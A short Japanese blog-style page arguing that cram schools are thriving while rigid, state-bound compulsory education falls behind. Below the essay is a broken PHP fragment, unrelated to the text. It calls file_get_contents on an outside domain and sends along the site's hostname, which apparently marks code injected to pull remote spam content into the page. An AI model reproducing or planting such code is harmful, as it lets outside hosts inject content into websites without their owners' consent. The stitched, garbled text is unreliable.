前へ
次へ

盛り上がる塾と衰退する義務教育

教育とは一言では表現できないほど奥深いものです。
子供の将来を大きく左右するのがその教育方針です。
学校の教育、家族の教育、様々な教育の種類がありますが、近年著しく盛り上がっているのは塾市場であると言えます。
義務教育は国との強いつながりから、学校単体で大きく教育方針を変更したり、資材を調達したりなどが柔軟にできません。
それに引き換え塾は真逆で、柔軟にというより自由です。
国とのつながりがほぼありませんので、非常にユニークな教育方針や最先端の教育方針を取り入れることが容易にできます。
それゆえに塾は物凄いスピードで浸透し、あっという間に義務教育レベルで世の中に馴染みました。
いまでは義務教育+塾は当たり前のセットになっていています。
昔ながらの教育方針のまま動けない義務教育と、自由に進化し続けられる塾。
そして実際塾によっての実績も右肩上がりです。
これから先で義務教育の本当の立ち位置が危うまれる状況になってきています。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top